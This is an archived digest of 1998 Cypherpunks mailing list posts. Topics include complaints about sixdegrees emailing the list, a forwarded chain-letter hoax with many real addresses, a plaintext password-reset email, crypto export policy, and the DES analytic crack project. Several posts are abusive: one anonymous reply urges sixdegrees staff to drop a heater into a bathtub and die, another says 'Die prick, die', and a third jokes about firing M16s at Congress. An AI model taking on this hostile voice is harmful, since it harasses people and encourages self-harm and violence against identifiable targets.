Content-Type: text/plain



(I was not sure which email address to send this to, as the return
address was:  nobody@replay.com.  I also do not know who to address this
email to.)

I am the WHOIS contact at sixdegrees you sent this email to, and since
this is a peronal reply to your email, it is certainly NOT spam and I
would appreciate it if you would take the time to read it and respond.

I am very confused by your email.  I understand that you do not wish to
receive emails from sixdegrees, but it is very easy to solve this
problem.  If anyone ever sponsors you for sixdegrees, simply reply to
the email and put the word "remove" in the header.  (This is pretty
standard stuff across the Internet, as I am sure you are aware.)  If
that occurs, in the future we will not send emails to the email address
that received the original email from us.

Unfortunately, if you have many email addresses (as it appears, from the
bottom of your email), the only way for us to remove each is to have a
sixdegrees email go to each of these email address accounts and then
received a "remove" reply to each of these emails.  (We have in our
records references to 5 different cypherpunks email addresses: 
@toad.com, @cypherpunks.net, @cypherpunks.org, @algebra.com, and
@ssz.com.  If you wish for us not to contact you again at any of these
addresses, we will need to confirm that you in fact control these email
addresses.  The best way for you to do this is to send an email to
cancel@sixdegrees.com, and ask to have these email addresses removed. 
We will then send a reply to each email address you listed, asking you
to confirm that you in fact control those email addresses and wish to
have them removed.  Once we receive your confirmation, we will adjust
our records so you receive no further emails from us to those email
addresses.  For example, if I receive an email from you to this email, I
will assume that you control the @toad.com email address and I will have
that removed.)

What is confusing to me is that the email you received from sixdegrees
(with the subject:  Harald Fragner) is one that would be sent ONLY to a
CONFIRMED sixdegrees user.  That means that once upon a time, whether
you remember or not, you joined sixdegrees (as have over 1,000,000
people to date).  It also appears that you listed Harald Fragner as a
contact, and he recently denied his sixdegrees relationship with you. 
Thus, it is not surprising that you would receive emails from
sixdegrees, as you had registered for our service at one time.  (I
assume that the email address you used to register with sixdegrees was
the @toad.com one.)

sixdegrees is purely a voluntary service, and if you do not want to
participate in it, then we are happy to accommodate you.  We do not send
out spam and take great efforts to ensure that no one receives unwanted
email from us.

I look forward to receiving your reply to this email.

Mark Salamon
General Counsel
MacroView Communications Corp.



Anonymous wrote:
> 
> On Tue, 15 Sep 1998, the shitheads at sixdegrees spammed the Cypherpunks
> list with:
> 
> > Just a quick update from sixdegrees(tm). Unfortunately Harald
> > Fragner (harald@fragner.net) asked not to be listed as your
> > contact with sixdegrees.
> >
> > We also wanted to make sure you were aware that you currently
> > have no other confirmed contacts, so it will be hard for you to
> > have a productive sixdegrees experience. As you probably know,
> > without any confirmed contacts, you won't get any results from our
> > networking searches.
> >
> > So, we just wanted to recommend that you head over to
> > http://www.sixdegrees.com , log-in, and go to MY CONTACTS
> > to list additional relationships.
> >
> >
> > ====================================================================
> > PLEASE NOTE: All replies to this address are processed by a computer.
> > If you have any problems, questions or requests send an e-mail to
> > issues@sixdegrees.com and someone will get back to you as soon as
> > possible.
> > ====================================================================
> >
> >
> > E.DB.BRESP.3
> >
> >
> 
> Just a quick update from the Cypherpunks(tm). Fortunately, we don't want
> anything to do with your worthless, pathetic, spamming selves. We don't
> want to be your friends and, in fact, we'd prefer it if you would crawl
> under a rock and die because that seems to be the only way you'll stop
> spamming our mailing list.
> 
> We also wanted to make sure that you were aware that you currently have no
> confirmed redeeming qualities, so it will be hard for you to be taken
> seriously by those of us who do have a clue. As you probably know, without
> any redeeming qualities, you will get lots of results every time you send
> out a batch of spam.
> 
> So, we just wanted to recommend that you head on over to your bathtub with
> the rest of your coworkers, fill it up, jump in together, and then drop in
> a large, plugged-in, turned-on electric heater into the water and remain
> in until you stop twitching and cardiac activity ceases.
> 
> C.LU.EFULS.2000
> 
> You people don't give a fuck how much excrement you shoot all over the
> net, so long as you let people know of your pathetic, worthless,
> disgusting service. If you can get somebody's mailing list to relay your
> shit for you, so much the better, because then you don't have to
> personally send it.
> 
> Sorry, but I've had it with Sixdegrees. I've personally told you idiots
> very nicely what the Cypherpunks list is, and asked you nicely to stop
> spamming it. I've personally told you a method to keep people from
> submitting these addresses to your worthless spam haven. Other people have
> done the same thing. You haven't fixed it, indicating that you don't care.
> I'm no longer asking nicely.
> 
> A copy is being sent to your technical contact, on the assumption that
> maybe he is a little more responsible, though I doubt it.
> 
> -- The Cypherpunks List <cypherpunks@toad.com,
> cypherpunks@*.cyberpass.net, cypherpunks@*.ssz.com,
> cypherpunks@algebra.com, and others>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blanc" <blancw@cnw.com>
Date: Wed, 16 Sep 1998 14:05:17 +0800
To: <cypherpunks@Algebra.COM>
Subject: RE: [NYT] Bell-South charging access fees for phone-over-Internet
In-Reply-To: <3.0.5.32.19980914104601.008b0a10@idiom.com>
Message-ID: <000101bde1a5$fd2d4da0$4f8195cf@blanc>
MIME-Version: 1.0
Content-Type: text/plain




Indirectly, I am already being charged a tax for internet service:   this month AT&T added
a "Universal Connectivity Charge" for a "Universal Service Fund" which "not only helps
provide affordable phone service but also gives schools and libraries access to the
internet."

It's only $1.88 right now, just a wedge . . .

    ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "GORDON, JEFFREY A" <JGORDON@scana.com>
Date: Wed, 16 Sep 1998 10:45:43 +0800
To: "'Chiu Ngan'" <vanessa.ho@mailexcite.com
Subject: RE: I don't care if this is real or not! But forwarding is not hard for me if I help
Message-ID: <F525F8BD7E28D211B9460008C7A4AA1F106621@MSG02.scana.com>
MIME-Version: 1.0
Content-Type: text/plain



>From http://jacksonville.com/tu-online/stories/021798/web217__.html

Chain letter: Poor Timothy Flyte. He's dying of ostriopliosis of the liver
and is urging Internet users to forward his electronic chain letter to
everyone in their address books. The letter says a children's hospital will
donate 7 cents to the National Disease Society for every person who forwards
the letter. But wait: There is no such disease as ''ostriopliosis,'' there
is no such thing as the National Disease Society and the name Timothy Flyte
apparently was taken from Peter O'Toole's character in the movie Phantoms.
At the end, the letter includes a threat to those who don't forward it that
''what goes around comes around.'' This piece of e-junk is a particularly
loathsome example of Internet chain letters. If you receive this letter or
any other electronic chain letter, do the world a favor: Delete it without
forwarding it to anyone and inform the person who sent it to you that the
letter is a hoax. For the full story on this letter, see The Mining Co.'s
guide to urban legends.

> -----Original Message-----
> From:	Chiu Ngan [SMTP:simpsonngan@hotmail.com]
> Sent:	Wednesday, September 16, 1998 4:52 AM
> To:	dueli@hotmail.com; centrebet@centrebet.com.au; contact@unsw.edu.au;
> Declan@well.com; Dodwellleung@hotmail.com; dlin@gpu.srv.ualberta.ca;
> dorngan@hkstar.com.hk; cypherpunks@toad.com; cj2802@singnet.com.sg;
> parsley@unforgettable.com; S.Lundy@unsw.edu.au; accounts@magna.com.au;
> n.harding@unsw.edu.au; philiph@magna.com.au; ulf@fitug.de;
> leevv@hotmail.com; vanessa.ho@mailexcite.com
> Subject:	Fwd: I don't care if this is real or not! But forwarding is
> not hard for me if I help
> 
> 
> 
> >Received: from 136.148.1.253 by www.hotmail.com with HTTP;
> >	Tue, 15 Sep 1998 05:55:15 PDT
> >X-Originating-IP: [136.148.1.253]
> >From: "Dodwell Leung" <dodwellleung@hotmail.com>
> >To: alexccl@hotmail.com, z2181727@student.unsw.edu.au, 
> antonylam@hotmail.com, chonga@sbu.ac.uk, z2183890@student.unsw.edu.au, 
> lcy@qms.ndirect.co.uk, z2155343@student.unsw.edu.au, bahrid@hotmail.com, 
> daner@mail.mkv.mh.se, Evert.P.deVries@SI.shell.com, 
> harold.tan@mailexcite.com, ivanyip@hotmail.com, catkoo@hotmail.com, 
> jennyshek@hotmail.com, BKKsomporb@mail.nomura.com.hk, 
> joe621@netvigator.com, heyloe@hotmail.com, kmyk@hotmail.com, 
> kenjess@apanet.com.au, lawhon@hotmail.com, lfan@mail.uoknor.edu, 
> 95481624J@hkpucc.polyu.edu.hk, shukai@netvigator.com, 
> z2188635@student.unsw.edu.au, mattgow@hotmail.com, 
> z2192026@student.unsw.edu.au, z2174314@student.unsw.edu.au, 
> Steeve.Genot@wanadoo.fr, hsp996@hotmail.com, physpot@asiaonline.net, 
> pixie_tan@hotmail.com, pooi_lee_chow@hotmail.com, eeyatir@hotmail.com, 
> saralee@chevalier.net, patelsu@sbu.ac.uk, beetch@pacific.net.sg, 
> z2188232@student.unsw.edu.au, simpsonngan@hotmail.com, 
> yoon@pacific.net.sg, hamster.sol@lineone.net, stepcom@hkstar.com, 
> ext3366@yahoo.com, tinyau1@netvigator.com, z2193851@student.unsw.edu.au, 
> huvl@sbu.ac.uk, z2193612@student.unsw.edu.au, willmilk@hotmail.com, 
> wswinnie@netvigator.com, brackeye@hkstar.com, takleung@wisdom.com.hk
> >Subject: I don't care if this is real or not! But forwarding is not 
> hard for me if I help
> >Content-Type: text/plain
> >Date: Tue, 15 Sep 1998 05:55:15 PDT
> >
> >
> >>Received: from 202.184.46.2 by www.hotmail.com with HTTP;
> >>	Tue, 15 Sep 1998 01:39:48 PDT
> >>X-Originating-IP: [202.184.46.2]
> >>From: "san san" <seliness@hotmail.com>
> >>To: alanling@usa.net, calviny@mol.net.my, chowpin@edb.gov.sg, 
> >chan911@pc.jaring.my, gary_wang@hotmail.com, junifer@pl.jaring.my, 
> >karren@deakin.edu.au, klay@okstate.edu, lkhoong@pc.jaring.my, 
> >mcch@hotmail.com, murphy_l@hotmail.com, simfong@pl.jaring.my, 
> >stchai@pl.jaring.my, mote@hotmail.com, tlliew@tm.net.my, 
> >wthong@pl.jaring.my, dodwellleung@hotmail.com
> >>Subject: Fwd: This is serious PLEEEEEEASE PLEASE DON'T DELETE!!!!!
> >>Content-Type: text/plain
> >>Date: Tue, 15 Sep 1998 01:39:48 PDT
> >>
> >>
> >>>Received: from 202.188.25.160 by www.hotmail.com with HTTP;
> >>>	Mon, 14 Sep 1998 06:27:23 PDT
> >>>X-Originating-IP: [202.188.25.160]
> >>>From: "Lim Huey" <shaohuey@hotmail.com>
> >>>To: alexlimyk@hotmail.com, audrey.looi@mailexcite.com, 
> >>kianwah19@hotmail.com, enyen@hotmail.com, s9812221@unitele.com.my, 
> >>rckj@hotmail.com, seliness@hotmail.com, stanchow@tm.net.my, 
> >>bhchua7@hotmail.com, csheng@rocketmail.com, yoongyow@hotmail.com, 
> >>ching20@hotmail.com, lphoo@hotmail.com, ken_thong@rocketmail.com, 
> >>twinsck@hotmail.com, poaysun@yahoo.com, mda97mk@sheffield.ac.uk, 
> >>yongqiang13@hotmail.com, sammy_lee_79@hotmail.com, 
> >>tungweileong@hotmail.com, lifesignx@yahoo.com, elim331@yahoo.com, 
> >>lwloh@hotmail.com, audrey.looi@mailcity.com, sokyee@pc.jaring.my, 
> >>kah_kit@hotmail.com, siewgar@hotmail.com, chiane@mailcity.com, 
> >>Vvpenguin@hotmail.com, pkleong@hotmail.com, phangf@hotmail.com, 
> >>rolandhii@hotmail.com, stjdanzel@hotmail.com, leesiehui@hotmail.com, 
> >>jeennwei@hotmail.com, chouyong@hotmail.com, ttc1979@yahoo.com, 
> >>guatyen@hotmail.com, chonkit@hotmail.com, thongyp@hotmail.com, 
> >>soonfung@hotmail.com, tsueyyin@hotmail.com, feiyy@hotmail.com
> >>>Subject: Fwd: This is serious PLEEEEEEASE PLEASE DON'T DELETE!!!!!
> >>>Content-Type: text/plain
> >>>Date: Mon, 14 Sep 1998 06:27:23 PDT
> >>>
> >>>
> >>>
> >>>
> >>>>Date: Mon, 14 Sep 1998 04:25:43 -0700 (PDT)
> >>>>From: CHEW JUNN WENG <jwchew@rocketmail.com>
> >>>>Subject: This is serious PLEEEEEEASE PLEASE DON'T DELETE!!!!!
> >>>>To: lmoonc@hotmail.com, pvcheo@essex.ac.uk, cwnsim@essex.ac.uk,
> >>>>  yoongyow@hotmail.com, lenelene@hotmail.com, gcping38@mailcity.com,
> >>>>  gthong@rocketmail.com, ching20@hotmail.com, 
> lcchuan@rocketmail.com,
> >>>>  moon@tm.net.my, shaohuey@hotmail.com, janelsl@tm.net.my,
> >>>>  csheng@rocketmail.com, hwooi@yahoo.com, dianacn@hotmail.com,
> >>>>  stjdanzel@hotmail.com, effyjungle@hotmail.com, 
> >bus_tard@hotmail.com,
> >>>>  lphoo@hotmail.com, yakasaki@hotmail.com, colint79@hotmail.com
> >>>>Cc: anniesia@hotmail.com, pearlng@hotmail.com, liangser@hotmail.com,
> >>>>  choopar@hotmail.com
> >>>>
> >>>>
> >>>>
> >>>>
> >>>>
> >>>>
> >>>>
> >>>>Hello, my name is David "Darren" Bucklew. I live in 
> >>>>Pittsburgh PA where I attend Bethel Park High School
> >>>>and participate in  many sports.  I have severe
> >>>>ostriopliosis of the liver. (My liver is extremely 
> >>>>inflamed).
> >>>>Modern Science has yet to find a cure.  Valley
> >>>>Childrens hospital 
> >>>>> has agreed to donate  7 cents to the National
> >>>>Diesese Society for every name 
> >>>> on  this letter.Please send it around as much as you
> >>>>can.
> >>>>Thank you,
> >>>>Darren
> >>>>
> >>>>PS: For those of you who dont take 5 minutes to do 
> >>>>this, what goes around comes around. You can help
> >>>>sick people, and it costs you nothing,yet you are too
> >>>>lazy to do it?  You will get what you deserve. 
> >>>>
> >>>>_________________________________________________________
> >>>>DO YOU YAHOO!?
> >>>>Get your free @yahoo.com address at http://mail.yahoo.com
> >>>>
> >>>>
> >>>
> >>>
> >>>______________________________________________________
> >>>Get Your Private, Free Email at http://www.hotmail.com
> >>
> >>
> >>______________________________________________________
> >>Get Your Private, Free Email at http://www.hotmail.com
> >
> >
> >______________________________________________________
> >Get Your Private, Free Email at http://www.hotmail.com
> 
> 
> ______________________________________________________
> Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 16 Sep 1998 13:39:21 +0800
To: Declan McCullagh <mark@sixdegrees.com>
Subject: Re: A personal response to your email to sixdegrees
In-Reply-To: <35FFD638.DB6920D3@sixdegrees.com>
Message-ID: <v03130301b225b4156c32@[209.66.100.71]>
MIME-Version: 1.0
Content-Type: text/plain



At 10:09 AM -0700 9/16/98, Declan McCullagh wrote:
>Mark, trust me on this: remove all five cypherpunks addresses from your
>lists.
>
>Really.
>

As others have noted, operations like "sixdegrees" need to be very careful
about how list addresses are signed up. This is a problem mailing lists
(formerly called "list exploders," until Congress began to rant about
Internet terrorists) have been dealing with for many years.

"Lists subscribed to lists," with resulting circularity problems, is
something that can bring a list to standstill.

>From the dozens of irate messages about "sixdegrees," and the joking
responses sent to "I hear you are my friend, but who are you?" queries seen
from hapless "sixdegrees" clients, the meltdown may be underway.

There are concrete things you folks can do. When someone is nominated (or
whatever) as a potential contact, you can ask the contactee if he or she
wants this person to be a contact. In other words, take some of the
automation out of the loop.

(Or add more of the right kind, such as sending a cookie or chit back to
the parties and require them to forward the cookies back. This, of course,
adds complexity for the "sixdegrees" customers and may actually cause many
of them to just give up in frustration.)

If you do nothing, expect many of us to get more and more irate at the
abuses your service are facillitating. I expect some of the list
subscribers on lists your service "infects" will take the usual hackers
measures to crash your system.

Not that I necessarily endorse this, but it's happened in the past.

--Tim May

(This space left blank pending determ. of acceptability to the gov't.)
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "sixdegrees"<h3ad5034@auto.sixdegrees.com>
Date: Wed, 16 Sep 1998 10:53:19 +0800
To: "Joe Cypherpunk"<cypherpunks@toad.com>
Subject: Your new password
Message-ID: <199809161546.IAA23087@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Name: Joe Cypherpunk
sixdegrees Password: rollflip

In response to your request for a new sixdegrees(tm) password, 
we have sent you the following temporary password: rollflip. 

As soon as you come to the site, http://www.sixdegrees.com , and use 
it to log-in on the home page, it will become your official 
password, and your old password will be deactivated. 

(If you end up remembering your old password and use that to 
log-in at the site before using this new temporary password, 
the temporary password will be deactivated.)

This may seem wacky, but it's for your security. And, either 
way, once you successfully log-in at the site, you can go to 
your personal profile and choose whatever password you like - 
in fact, we encourage you to do so.

If you never requested a new password and got this message in 
error, just continue using your old password and e-mail us at 
issues@sixdegrees.com. 

====================================================================
PLEASE NOTE: All replies to this address are processed by a computer.
If you have any problems, questions or requests send an e-mail to 
issues@sixdegrees.com and someone will get back to you as soon as 
possible.
====================================================================




E.SI.REQPW.1




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bmccaffrey@executive.com
Date: Wed, 16 Sep 1998 15:02:15 +0800
To: cypherpunks@sirius.infonex.com
Subject: RE: the people
Message-ID: <4CBEEB8C7D24D211971500A0C98F15BC02EE85@mail.executive.com>
MIME-Version: 1.0
Content-Type: text/plain




Monday, September 14, 1998 - 23:20:36

Question: How is it, that the FBI has so much power?
Answer: Because 'the people' didn't do swat to stop them[the FBI].

Question: How do 'the people' change the situation?
Answer: 'The people' get out their banners and megaphones and march on
the Congress.

Question: What do 'the people' do then they[Congress] don't hear 'the
people'?
Answer: 'The people' go on strike.

Question: What do 'the people' do when Congress doesn't care about their
strikes?
Answer: 'The people' fire their M16'eens at Congress which they brought
with them.

Question: So where are 'the people'?      
Answer: At home watching the coverage of these exciting events on TV.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Mynott <stevem@tightrope.demon.co.uk>
Date: Wed, 16 Sep 1998 05:50:19 +0800
To: cypherpunks <cypherpunks@cyberpass.net>
Subject: Investigators find "assassination" page on the Web
Message-ID: <19980916114905.A11245@tightrope.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



http://cnn.com/TECH/computing/9809/15/internet.hit.list.ap/index.html
   
Investigators find "assassination" page on the Web

   hit.list September 15, 1998
   Web posted at 4:07 PM ET
   
   Portland, Oregon (AP) -- Three Internal Revenue Service agents and a
   federal magistrate are the targets on what's described as an Internet
   "assassination" Web page.
   
   All four have prices on their heads -- in unusual amounts like 512
   dollars and two cents.
   
   IRS investigators think it was posted by a patient in a federal mental
   hospital.
   
   The page is thought to be from an essay called "Assassination
   Politics." That essay -- written by a jailed tax protester --
   describes a supposedly risk-free way to reward those who assassinate
   public officials.
   
   Anyone who wants to see someone killed contributes to a fund which --
   when large enough -- attracts a killer who predicts the date, time and
   location for the deed to be done.
   
   If it happens, the killer is paid with untraceable digital money.

-- 
pgp 1024/D9C69DF9 1997/10/14 steve mynott <steve@tightrope.demon.co.uk>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Wed, 16 Sep 1998 14:09:53 +0800
To: cypherpunks@toad.com
Subject: Re: US Updates Crypto Policy
In-Reply-To: <199809161613.MAA07615@dewdrop2.mindspring.com>
Message-ID: <36000A69.74D5@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



>      As the Vice President stated in a letter to Senator Daschle, the
> Administration remains committed to assuring that the nation?s law
> enforcement community will be able to access, under strictly defined legal
> procedures, the plain text of criminally related communications and stored
> information.   The Administration intends to support FBI?s establishment of
> a technical support center to help build the technical capacity of law
> enforcement - Federal, State, and local - to stay abreast of advancing
> communications technology.
> 
Considering that domestic controls are not discussed they are certainly
mentioning a lot of activities that sound like they would be taking
place here in the US. They also mention a wide range of LEAs that would
welcome domestic controls. 

Is this just a continuation of the attempt to control domestic use by
export policy? 

Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 16 Sep 1998 05:06:53 +0800
To: cypherpunks@toad.com
Subject: Re: Fwd: I don't care if this is real or not!
Message-ID: <199809161001.MAA18320@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



You suck... Die prick, die



Crack head <simpsonngan@hotmail.com> wrote:
>
> 
> >Received: from 136.148.1.253 by www.hotmail.com with HTTP;
> >	Tue, 15 Sep 1998 05:55:15 PDT
> >X-Originating-IP: [136.148.1.253]
> >From: "Dodwell Leung" <dodwellleung@hotmail.com>
> >To: alexccl@hotmail.com, z2181727@student.unsw.edu.au, 
> antonylam@hotmail.com, chonga@sbu.ac.uk,
z2183890@student.unsw.edu.au, 
> lcy@qms.ndirect.co.uk, z2155343@student.unsw.edu.au,
bahrid@hotmail.com, 
> daner@mail.mkv.mh.se, Evert.P.deVries@SI.shell.com, 
> harold.tan@mailexcite.com, ivanyip@hotmail.com, catkoo@hotmail.com, 
> jennyshek@hotmail.com, BKKsomporb@mail.nomura.com.hk, 
> joe621@netvigator.com, heyloe@hotmail.com, kmyk@hotmail.com, 
> kenjess@apanet.com.au, lawhon@hotmail.com, lfan@mail.uoknor.edu, 
> 95481624J@hkpucc.polyu.edu.hk, shukai@netvigator.com, 
> z2188635@student.unsw.edu.au, mattgow@hotmail.com, 
> z2192026@student.unsw.edu.au, z2174314@student.unsw.edu.au, 
> Steeve.Genot@wanadoo.fr, hsp996@hotmail.com, physpot@asiaonline.net, 
> pixie_tan@hotmail.com, pooi_lee_chow@hotmail.com,
eeyatir@hotmail.com, 
> saralee@chevalier.net, patelsu@sbu.ac.uk, beetch@pacific.net.sg, 
> z2188232@student.unsw.edu.au, simpsonngan@hotmail.com, 
> yoon@pacific.net.sg, hamster.sol@lineone.net, stepcom@hkstar.com, 
> ext3366@yahoo.com, tinyau1@netvigator.com,
z2193851@student.unsw.edu.au, 
> huvl@sbu.ac.uk, z2193612@student.unsw.edu.au, willmilk@hotmail.com, 
> wswinnie@netvigator.com, brackeye@hkstar.com, takleung@wisdom.com.hk
> >Subject: I don't care if this is real or not! But forwarding is not 
> hard for me if I help
> >Content-Type: text/plain
> >Date: Tue, 15 Sep 1998 05:55:15 PDT
> >
> >
> >>Received: from 202.184.46.2 by www.hotmail.com with HTTP;
> >>	Tue, 15 Sep 1998 01:39:48 PDT
> >>X-Originating-IP: [202.184.46.2]
> >>From: "san san" <seliness@hotmail.com>
> >>To: alanling@usa.net, calviny@mol.net.my, chowpin@edb.gov.sg, 
> >chan911@pc.jaring.my, gary_wang@hotmail.com, junifer@pl.jaring.my, 
> >karren@deakin.edu.au, klay@okstate.edu, lkhoong@pc.jaring.my, 
> >mcch@hotmail.com, murphy_l@hotmail.com, simfong@pl.jaring.my, 
> >stchai@pl.jaring.my, mote@hotmail.com, tlliew@tm.net.my, 
> >wthong@pl.jaring.my, dodwellleung@hotmail.com
> >>Subject: Fwd: This is serious PLEEEEEEASE PLEASE DON'T DELETE!!!!!
> >>Content-Type: text/plain
> >>Date: Tue, 15 Sep 1998 01:39:48 PDT
> >>
> >>
> >>>Received: from 202.188.25.160 by www.hotmail.com with HTTP;
> >>>	Mon, 14 Sep 1998 06:27:23 PDT
> >>>X-Originating-IP: [202.188.25.160]
> >>>From: "Lim Huey" <shaohuey@hotmail.com>
> >>>To: alexlimyk@hotmail.com, audrey.looi@mailexcite.com, 
> >>kianwah19@hotmail.com, enyen@hotmail.com, s9812221@unitele.com.my, 
> >>rckj@hotmail.com, seliness@hotmail.com, stanchow@tm.net.my, 
> >>bhchua7@hotmail.com, csheng@rocketmail.com, yoongyow@hotmail.com, 
> >>ching20@hotmail.com, lphoo@hotmail.com, ken_thong@rocketmail.com, 
> >>twinsck@hotmail.com, poaysun@yahoo.com, mda97mk@sheffield.ac.uk, 
> >>yongqiang13@hotmail.com, sammy_lee_79@hotmail.com, 
> >>tungweileong@hotmail.com, lifesignx@yahoo.com, elim331@yahoo.com, 
> >>lwloh@hotmail.com, audrey.looi@mailcity.com, sokyee@pc.jaring.my, 
> >>kah_kit@hotmail.com, siewgar@hotmail.com, chiane@mailcity.com, 
> >>Vvpenguin@hotmail.com, pkleong@hotmail.com, phangf@hotmail.com, 
> >>rolandhii@hotmail.com, stjdanzel@hotmail.com,
leesiehui@hotmail.com, 
> >>jeennwei@hotmail.com, chouyong@hotmail.com, ttc1979@yahoo.com, 
> >>guatyen@hotmail.com, chonkit@hotmail.com, thongyp@hotmail.com, 
> >>soonfung@hotmail.com, tsueyyin@hotmail.com, feiyy@hotmail.com
> >>>Subject: Fwd: This is serious PLEEEEEEASE PLEASE DON'T DELETE!!!!!
> >>>Content-Type: text/plain
> >>>Date: Mon, 14 Sep 1998 06:27:23 PDT
> >>>
> >>>
> >>>
> >>>
> >>>>Date: Mon, 14 Sep 1998 04:25:43 -0700 (PDT)
> >>>>From: CHEW JUNN WENG <jwchew@rocketmail.com>
> >>>>Subject: This is serious PLEEEEEEASE PLEASE DON'T DELETE!!!!!
> >>>>To: lmoonc@hotmail.com, pvcheo@essex.ac.uk, cwnsim@essex.ac.uk,
> >>>>  yoongyow@hotmail.com, lenelene@hotmail.com,
gcping38@mailcity.com,
> >>>>  gthong@rocketmail.com, ching20@hotmail.com, 
> lcchuan@rocketmail.com,
> >>>>  moon@tm.net.my, shaohuey@hotmail.com, janelsl@tm.net.my,
> >>>>  csheng@rocketmail.com, hwooi@yahoo.com, dianacn@hotmail.com,
> >>>>  stjdanzel@hotmail.com, effyjungle@hotmail.com, 
> >bus_tard@hotmail.com,
> >>>>  lphoo@hotmail.com, yakasaki@hotmail.com, colint79@hotmail.com
> >>>>Cc: anniesia@hotmail.com, pearlng@hotmail.com,
liangser@hotmail.com,
> >>>>  choopar@hotmail.com
> >>>>
> >>>>
> >>>>
> >>>>
> >>>>
> >>>>
> >>>>
> >>>>Hello, my name is David "Darren" Bucklew. I live in 
> >>>>Pittsburgh PA where I attend Bethel Park High School
> >>>>and participate in  many sports.  I have severe
> >>>>ostriopliosis of the liver. (My liver is extremely 
> >>>>inflamed).
> >>>>Modern Science has yet to find a cure.  Valley
> >>>>Childrens hospital 
> >>>>> has agreed to donate  7 cents to the National
> >>>>Diesese Society for every name 
> >>>> on  this letter.Please send it around as much as you
> >>>>can.
> >>>>Thank you,
> >>>>Darren
> >>>>
> >>>>PS: For those of you who dont take 5 minutes to do 
> >>>>this, what goes around comes around. You can help
> >>>>sick people, and it costs you nothing,yet you are too
> >>>>lazy to do it?  You will get what you deserve. 
> >>>>
> >>>>_________________________________________________________
> >>>>DO YOU YAHOO!?
> >>>>Get your free @yahoo.com address at http://mail.yahoo.com
> >>>>
> >>>>
> >>>
> >>>
> >>>______________________________________________________
> >>>Get Your Private, Free Email at http://www.hotmail.com
> >>
> >>
> >>______________________________________________________
> >>Get Your Private, Free Email at http://www.hotmail.com
> >
> >
> >______________________________________________________
> >Get Your Private, Free Email at http://www.hotmail.com
> 
> 
> ______________________________________________________
> Get Your Private, Free Email at http://www.hotmail.com
> 
> 

==
"The same thing we do every night Pinkey,
 try to take over the WORLD!"
                          - The brain
_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Wed, 16 Sep 1998 14:05:57 +0800
To: Richard.Bragg@ssa.co.uk
Subject: Re: Democracy...
In-Reply-To: <80256681.0031C8CB.00@seunt002e.ssa.co.uk>
Message-ID: <36000B3E.780C@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



> However, if you believe in something to be life changing and > beneficial to both the idividual and society you'll want or be
> compelled to "pass it on". 
>
Altruistic on the surface. Regarding religion though, why do I always
get the feeling that when implemented and empowered it is judgemental
and intolerant of those who do not fall properly in line?

> What I wanted to illustrate is that there are absolutes, to say there
> are no obsolutes is in itself an absolute and so is self defeating.
>
All right Mr. Logic, you're so sharp, give me ONE example of a *moral*
absolute.

> We must have absolutes.
>
We do: speed of light, mass of the electron, probably, but behavior? We
have behaviors that facilitate our persistance and propagation as a
species at ever increasing densities. Operating outside the boundaries
is neither right nor wrong, simply different. Not necessarily without
consequences, but simply different. Your yardstick is an hallucination
to which you cling to forlornly like a kitten clinging to a stick in a
raging river.

Mike

ps - is 'forlornly' really a word? I think so, but it looks odd today.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Wed, 16 Sep 1998 12:05:44 +0800
To: cypherpunks@cyberpass.net
Subject: Re: The DES Analytic Crack Project
In-Reply-To: <35FF6B68.41B863BB@stud.uni-muenchen.de>
Message-ID: <199809161706.MAA16662@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de> writes:
 
> As far as I know Boolean minimization has been one of the central
> themes of people doing circuit design from the beginning. I should be
> surprised if there are spectacular breakthroughs recently.
 
The general boolean minimization problem is hard.  A specific boolean
minimization problem may or may not be difficult to solve.
 
Going back to our "safe execution" analogy; determining the runtime
properties of an arbitrary computer program by examination of the code
is impossible.  Determining whether Bob's page of assembler will write
all over the OS may be easy or hard, depending upon the code in
question.
 
Knapsack with power of two integers is trivial, general knapsack is
NP-Complete, and random knapsack is not secure enough to be used as a
strong cryptosystem.
 
So given a specific problem, like DES, it is wrong to say that DES is
combinatorially intractable because general satisfiability is hard or
general boolean minimization is hard and DES has a polynomial
reduction into such a problem, or that DES cannot be broken
analytically because there have been no "spectacular breakthroughs" in
the general case of these other problems.
 
DES is a single instance, not a class of problems.  It is of some
constant degree of difficulty, and solving it, even under the image of
a transformation into an instance of some other well-known problem,
implies things only about the strength of DES, and not about the
general case of other classes of problems which might be used to
represent it.
 
Breaking N-Round DES tells us only about the resistance of N-Round DES
to whatever attack we are using, and does not imply intractable
problems do not exist, or disclose some new sneak attack against all
problems in NP.
 
After this project is done, hard problems will still be hard.
 
Hopefully what will have been demonstrated is that a small simple
block cipher designed in the mid-70's is algebraically crunchable in a
lot less time than an exhaustive search would take.  An interesting
result, but one which has no huge implications for the larger scheme
of things.

-- 
Sponsor the DES Analytic Crack Project
http://www.cyberspace.org/~enoch/crakfaq.html
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
